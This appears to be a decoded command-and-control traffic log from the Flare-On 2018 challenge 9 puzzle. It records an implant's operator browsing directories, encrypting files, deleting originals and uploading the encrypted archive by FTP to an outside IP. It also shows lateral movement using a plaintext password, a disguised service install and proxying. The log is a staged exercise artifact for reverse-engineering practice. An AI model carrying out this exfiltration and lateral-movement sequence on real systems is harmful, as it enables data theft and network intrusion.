############################################################
Events:
authenticate: {'password': 'welcomepass1!1'}
shell_in: 'cd c:\\'
shell_in: 'dir'
shell_in: 'cd c:\\work'
shell_in: 'dir'
shell_in: 'cd c:\\work\\FlareOn2018_Challenge9'
shell_in: 'dir'
file_put: {'filepath': u'c:\\work\\FlareOn2018_Challenge9\\Cryptor.exe',
 'md5sum': '93cc547f9adbd6a4366d3d8b415a77f1'}
shell_in: 'dir'
shell_in: 'Cryptor level9.crypt level9.zip'
shell_in: 'dir'
shell_in: 'del level9.zip'
shell_in: 'del level9.exe'
shell_in: 'del level9.png'
ftp_activate: {'hostname': u'52.0.104.200',
 'password': u'',
 'port': 21,
 'username': u'anonymous'}
ftp_upload: {'localpath': u'c:\\work\\FlareOn2018_Challenge9\\level9.crypt',
 'remotepath': u'/upload/level9.crypt'}
shell_in: 'del level9.crypt'
shell_in: 'del Cryptor.exe'
shell_in: 'dir'
shell_deactiveate: None
exit: None
query_plugins: [{'id': '00000081',
  'name': '',
  'realname': 'MAINC2',
  'type': 'CMD ',
  'version': '1.5.0'},
 {'id': '00000083',
  'name': '',
  'realname': 'SHELL',
  'type': 'CMD ',
  'version': '1.2.0'},
 {'id': '00000082',
  'name': '',
  'realname': 'FILES',
  'type': 'CMD ',
  'version': '2.3.0'},
 {'id': '00000084',
  'name': '',
  'realname': 'PROXY',
  'type': 'CMD ',
  'version': '2.5.0'},
 {'id': '00000087',
  'name': '',
  'realname': 'FTP_EXFIL',
  'type': 'CMD ',
  'version': '1.1.0'},
 {'id': '00000085',
  'name': '',
  'realname': 'LATERAL',
  'type': 'CMD ',
  'version': '1.1.0'},
 {'id': '00000093',
  'name': '',
  'realname': 'CRYPTGENRANDOM',
  'type': 'RAND',
  'version': '1.0.3'},
 {'id': '0000008e',
  'name': '',
  'realname': 'HASHSHA256',
  'type': 'HASH',
  'version': '1.0.6'},
 {'id': '00000092',
  'name': '',
  'realname': 'AES128_CFB',
  'type': 'CRPT',
  'version': '1.0.9'},
 {'id': '00000078',
  'name': '',
  'realname': 'ZLIB',
  'type': 'COMP',
  'version': '1.2.11'},
 {'id': '0000008f',
  'name': '',
  'realname': 'HMACSHA256',
  'type': 'HMAC',
  'version': '1.0.9'}]
host_survey: {'default_locale': 1033,
 'host_id': '{f60f8b7b-63de-16f0-2448-02f52ae846c3}',
 'hostname': u'LARRYJOHNSON-PC',
 'malware_version': '3.0.8',
 'memo': u'feye2018 pipe srv',
 'os_version': '6.1.7601',
 'username': u'SYSTEM'}
shell_out
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
shell_out
cd c:\

c:\>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\

06/10/2009  02:42 PM                24 autoexec.bat
06/10/2009  02:42 PM                10 config.sys
07/13/2009  07:37 PM    <DIR>          PerfLogs
07/19/2018  03:02 PM    <DIR>          Program Files
07/23/2018  09:29 PM    <DIR>          temp
05/24/2017  11:45 AM    <DIR>          Users
08/10/2018  08:21 AM    <DIR>          Windows
07/23/2018  10:26 AM    <DIR>          work
               2 File(s)             34 bytes
               6 Dir(s)  52,576,829,440 bytes free

c:\>
shell_out
cd c:\work

c:\work>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work

07/23/2018  10:26 AM    <DIR>          .
07/23/2018  10:26 AM    <DIR>          ..
07/23/2018  10:26 AM    <DIR>          FlareOn2017_challenge10
08/10/2018  08:08 AM    <DIR>          FlareOn2018_Challenge9
07/23/2018  10:26 AM    <DIR>          Helix
07/23/2018  10:25 AM    <DIR>          NX_Code
07/23/2018  10:26 AM    <DIR>          X16
               0 File(s)              0 bytes
               7 Dir(s)  52,576,034,816 bytes free

c:\work>
shell_out
cd c:\work\FlareOn2018_Challenge9

c:\work\FlareOn2018_Challenge9>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018_Challenge9

08/10/2018  08:08 AM    <DIR>          .
08/10/2018  08:08 AM    <DIR>          ..
07/19/2018  02:24 PM             6,656 level9.exe
08/10/2018  07:35 AM            14,502 level9.png
08/10/2018  07:40 AM            10,223 level9.zip
               3 File(s)         31,381 bytes
               2 Dir(s)  52,576,034,816 bytes free

c:\work\FlareOn2018_Challenge9>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018_Challenge9

08/10/2018  08:24 AM    <DIR>          .
08/10/2018  08:24 AM    <DIR>          ..
08/10/2018  08:24 AM            12,288 Cryptor.exe
07/19/2018  02:24 PM             6,656 level9.exe
08/10/2018  07:35 AM            14,502 level9.png
08/10/2018  07:40 AM            10,223 level9.zip
               4 File(s)         43,669 bytes
               2 Dir(s)  52,576,022,528 bytes free

c:\work\FlareOn2018_Challenge9>
shell_out
Cryptor level9.crypt level9.zip

shell_out
Adding file level9.zip
Done

c:\work\FlareOn2018_Challenge9>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018_Challenge9

08/10/2018  08:24 AM    <DIR>          .
08/10/2018  08:24 AM    <DIR>          ..
08/10/2018  08:24 AM            12,288 Cryptor.exe
08/10/2018  08:24 AM            10,303 level9.crypt
07/19/2018  02:24 PM             6,656 level9.exe
08/10/2018  07:35 AM            14,502 level9.png
08/10/2018  07:40 AM            10,223 level9.zip
               5 File(s)         53,972 bytes
               2 Dir(s)  52,574,953,472 bytes free

c:\work\FlareOn2018_Challenge9>
shell_out
del level9.zip

c:\work\FlareOn2018_Challenge9>
shell_out
del level9.exe

c:\work\FlareOn2018_Challenge9>
shell_out
del level9.png

c:\work\FlareOn2018_Challenge9>
shell_out
del level9.crypt

c:\work\FlareOn2018_Challenge9>
shell_out
del Cryptor.exe

c:\work\FlareOn2018_Challenge9>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018_Challenge9

08/10/2018  08:26 AM    <DIR>          .
08/10/2018  08:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  52,574,937,088 bytes free

c:\work\FlareOn2018_Challenge9>
query_plugins: [{'id': '00000081',
  'name': '',
  'realname': 'MAINC2',
  'type': 'CMD ',
  'version': '1.5.0'},
 {'id': '00000083',
  'name': '',
  'realname': 'SHELL',
  'type': 'CMD ',
  'version': '1.2.0'},
 {'id': '00000082',
  'name': '',
  'realname': 'FILES',
  'type': 'CMD ',
  'version': '2.3.0'},
 {'id': '00000084',
  'name': '',
  'realname': 'PROXY',
  'type': 'CMD ',
  'version': '2.5.0'},
 {'id': '00000087',
  'name': '',
  'realname': 'FTP_EXFIL',
  'type': 'CMD ',
  'version': '1.1.0'},
 {'id': '00000085',
  'name': '',
  'realname': 'LATERAL',
  'type': 'CMD ',
  'version': '1.1.0'},
 {'id': '00000093',
  'name': '',
  'realname': 'CRYPTGENRANDOM',
  'type': 'RAND',
  'version': '1.0.3'},
 {'id': '0000008e',
  'name': '',
  'realname': 'HASHSHA256',
  'type': 'HASH',
  'version': '1.0.6'},
 {'id': '00000092',
  'name': '',
  'realname': 'AES128_CFB',
  'type': 'CRPT',
  'version': '1.0.9'},
 {'id': '00000078',
  'name': '',
  'realname': 'ZLIB',
  'type': 'COMP',
  'version': '1.2.11'},
 {'id': '0000008f',
  'name': '',
  'realname': 'HMACSHA256',
  'type': 'HMAC',
  'version': '1.0.9'}]
host_survey: {'default_locale': 1033,
 'host_id': '{f60f8b7b-63de-16f0-2448-02f52ae846c3}',
 'hostname': u'JOHNJACKSON-PC',
 'malware_version': '3.0.8',
 'memo': u'feye2018 tcp cli',
 'os_version': '6.1.7601',
 'username': u'john.jackson'}
drive_list: {'drives': [{'drive_letter': u'A:\\',
             'filesystem': u'',
             'free_space': 0,
             'name': u'',
             'total_space': 0,
             'type': 2},
            {'drive_letter': u'C:\\',
             'filesystem': u'NTFS',
             'free_space': 54842515456,
             'name': u'',
             'total_space': 64422408192,
             'type': 3},
            {'drive_letter': u'D:\\',
             'filesystem': u'',
             'free_space': 0,
             'name': u'',
             'total_space': 0,
             'type': 5},
            {'drive_letter': u'X:\\',
             'filesystem': u'HGFS',
             'free_space': 190915125248,
             'name': u'Shared Folders',
             'total_space': 1007057006592,
             'type': 4}]}
dir_list: {'contents': [{'filename': u'$Recycle.Bin'},
              {'filename': u'autoexec.bat'},
              {'filename': u'Boot'},
              {'filename': u'bootmgr'},
              {'filename': u'BOOTSECT.BAK'},
              {'filename': u'config.sys'},
              {'filename': u'Documents and Settings'},
              {'filename': u'pagefile.sys'},
              {'filename': u'PerfLogs'},
              {'filename': u'Program Files'},
              {'filename': u'ProgramData'},
              {'filename': u'Recovery'},
              {'filename': u'staging'},
              {'filename': u'System Volume Information'},
              {'filename': u'temp'},
              {'filename': u'Users'},
              {'filename': u'Windows'},
              {'filename': u'work'}],
 'dirname': u'c:\\'}
dir_list: {'contents': [{'filename': u'.'},
              {'filename': u'..'},
              {'filename': u'AX_Code'},
              {'filename': u'EX_Code'},
              {'filename': u'FlareOn2016'},
              {'filename': u'FlareOn2017'},
              {'filename': u'FlareOn2018'},
              {'filename': u'HX_Code'},
              {'filename': u'Malware'},
              {'filename': u'NX_Code'},
              {'filename': u'RSA_factoring'}],
 'dirname': u'c:\\work\\'}
shell_out
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\temp>
shell_out
cd c:\

c:\>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\

06/10/2009  02:42 PM                24 autoexec.bat
06/10/2009  02:42 PM                10 config.sys
07/13/2009  07:37 PM    <DIR>          PerfLogs
02/20/2013  05:08 PM    <DIR>          Program Files
08/01/2017  10:07 AM    <DIR>          staging
07/23/2018  12:38 PM    <DIR>          temp
05/24/2017  11:45 AM    <DIR>          Users
02/20/2013  05:18 PM    <DIR>          Windows
07/23/2018  07:45 AM    <DIR>          work
               2 File(s)             34 bytes
               7 Dir(s)  54,842,515,456 bytes free

c:\>
shell_out
cd c:\work\

c:\work>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work

07/23/2018  07:45 AM    <DIR>          .
07/23/2018  07:45 AM    <DIR>          ..
05/26/2013  08:36 AM    <DIR>          AX_Code
05/26/2013  08:37 AM    <DIR>          EX_Code
05/26/2013  08:40 AM    <DIR>          FlareOn2016
05/26/2013  08:37 AM    <DIR>          FlareOn2017
07/23/2018  07:53 AM    <DIR>          FlareOn2018
05/26/2013  08:41 AM    <DIR>          HX_Code
05/26/2013  08:41 AM    <DIR>          Malware
05/26/2013  08:40 AM    <DIR>          NX_Code
05/26/2013  08:37 AM    <DIR>          RSA_factoring
               0 File(s)              0 bytes
              11 Dir(s)  54,842,515,456 bytes free

c:\work>
shell_out
cd c:\work\flareon2018

c:\work\FlareOn2018>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018

07/23/2018  07:53 AM    <DIR>          .
07/23/2018  07:53 AM    <DIR>          ..
07/23/2018  07:45 AM    <DIR>          Challenge01
07/23/2018  07:45 AM    <DIR>          Challenge02
07/23/2018  07:45 AM    <DIR>          Challenge03
07/23/2018  07:46 AM    <DIR>          Challenge04
07/23/2018  07:46 AM    <DIR>          Challenge05
07/23/2018  07:46 AM    <DIR>          Challenge06
07/23/2018  07:46 AM    <DIR>          Challenge07
07/23/2018  07:46 AM    <DIR>          Challenge08
07/23/2018  10:44 AM    <DIR>          Challenge09
07/23/2018  07:46 AM    <DIR>          Challenge10
07/23/2018  07:53 AM    <DIR>          Challenge11
07/23/2018  07:53 AM    <DIR>          Challenge12
               0 File(s)              0 bytes
              14 Dir(s)  54,842,515,456 bytes free

c:\work\FlareOn2018>
shell_out
cd c:\work\flareon2018\Challenge09

c:\work\FlareOn2018\Challenge09>
shell_out
dir
 Volume in drive C has no label.
 Volume Serial Number is ECAA-2B67

 Directory of c:\work\FlareOn2018\Challenge09

07/23/2018  10:44 AM    <DIR>          .
07/23/2018  10:44 AM    <DIR>          ..
07/23/2018  10:45 AM               119 README.md
               1 File(s)            119 bytes
               2 Dir(s)  54,842,515,456 bytes free

c:\work\FlareOn2018\Challenge09>
shell_out
type README.md
# TODO By Larry

Larry is running late again. Check the wiki (http://wiki.flare.fireeye.com:8081) for latest updates.
c:\work\FlareOn2018\Challenge09>
shell_out
ping wiki.flare.fireeye.com

shell_out

Pinging wiki.flare.fireeye.com [192.168.200.4] with 32 bytes of data:
Reply from 192.168.200.4: bytes=32 time<1ms TTL=64

shell_out
Reply from 192.168.200.4: bytes=32 time<1ms TTL=64

shell_out
Reply from 192.168.200.4: bytes=32 time<1ms TTL=64

shell_out
Reply from 192.168.200.4: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.200.4:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

c:\work\FlareOn2018\Challenge09>
query_proxy: [{'hostanme': 'wiki.flare.fireeye.com', 'index': 0, 'port': 8081, 'type': 0}]
shell_out
ping larryjohnson-pc

Pinging larryjohnson-pc [fe80::905b:87b:5c8d:a243%11] with 32 bytes of data:
Reply from fe80::905b:87b:5c8d:a243%11: time<1ms 

shell_out
Reply from fe80::905b:87b:5c8d:a243%11: time<1ms 

shell_out
Reply from fe80::905b:87b:5c8d:a243%11: time<1ms 

shell_out
Reply from fe80::905b:87b:5c8d:a243%11: time<1ms 

Ping statistics for fe80::905b:87b:5c8d:a243%11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

c:\work\FlareOn2018\Challenge09>
query_proxy: [{'hostanme': 'wiki.flare.fireeye.com', 'index': 0, 'port': 8081, 'type': 0},
 {'hostanme': u'192.168.221.105',
  'index': 0,
  'pipe': u'malaproppipe',
  'type': 80}]
authenticate: {'password': 'welcomepass1!1'}
shell_in: 'cd c:\\'
shell_in: 'dir'
shell_in: 'cd c:\\work\\'
shell_in: 'dir'
shell_in: 'cd c:\\work\\flareon2018'
shell_in: 'dir'
shell_in: 'cd c:\\work\\flareon2018\\Challenge09'
shell_in: 'dir'
shell_in: 'type README.md'
shell_in: 'ping wiki.flare.fireeye.com'
shell_in: 'ping larryjohnson-pc'
lateral_activate: {'hostname': u'192.168.221.105',
 'password': u'n3v3rgunnag1veUup',
 'username': u'larry.johnson'}
lateral_install: {'args': u' -service',
 'filename': u'launchaccelerator.exe',
 'hostname': u'192.168.221.105',
 'service': u'LaunchAccelerator'}
lateral_config: {'commstype': 5,
 'hostname': '',
 'memo': u'feye2018 pipe srv',
 'mutex': u'asdliugasldmgj',
 'password': u'welcomepass1!1',
 'pipename': u'malaproppipe',
 'port': 0,
 'servicename': u'LaunchAccelerator'}
lateral_deactiveate: None
lateral_activate: {'hostname': u'192.168.221.105',
 'password': u'n3v3rgunnag1veUup',
 'username': u'larry.johnson'}
proxy_connect: {'hostname': 'wiki.flare.fireeye.com', 'port': 8081}
############################################################
Files:
05a3070492c6c9ca596997d3a79fe570: malaprop_stage3.dll_
93cc547f9adbd6a4366d3d8b415a77f1: c:\work\FlareOn2018_Challenge9\Cryptor.exe
81ce35acb25c57257e0517ff0f379e8c: level9.crypt
378e1ac4fa4ab0329332d823b3448a62: /
5aecc6708beef1e98bc627c16644a4fb: /moin_static199/common/js/common.js
1e3633d772c2d8057e4ec2cba0630bd6: /moin_static199/common/flare_logo64.png
6dfc2390288b83f9b8cc619ac65a24f9: /moin_static199/modernized/css/print.css
a7e8eb69c3314d556c23a85f366a3c86: /moin_static199/modernized/css/common.css
92e5379eafd4c4eebdda49e6c8d85986: /moin_static199/modernized/css/screen.css
e42b5dc28457c35e38d9570d8bb22be8: /moin_static199/modernized/css/projection.css
ef67a4e9689efda71625a2ef894fb700: /moin_static199/modernized/img/moin-www.png
824340baaf76d4442a9a47545061d464: /FlareProjects
58ae0d221fb2bb05f69a5a6b5ca2de30: /FlareOn2018
dab1c5d6bb69c6bf716826364b898cc1: /FlareOn2018Challenge9
e5660aeb0add65feb53179dfaf4a5c97: level9.zip
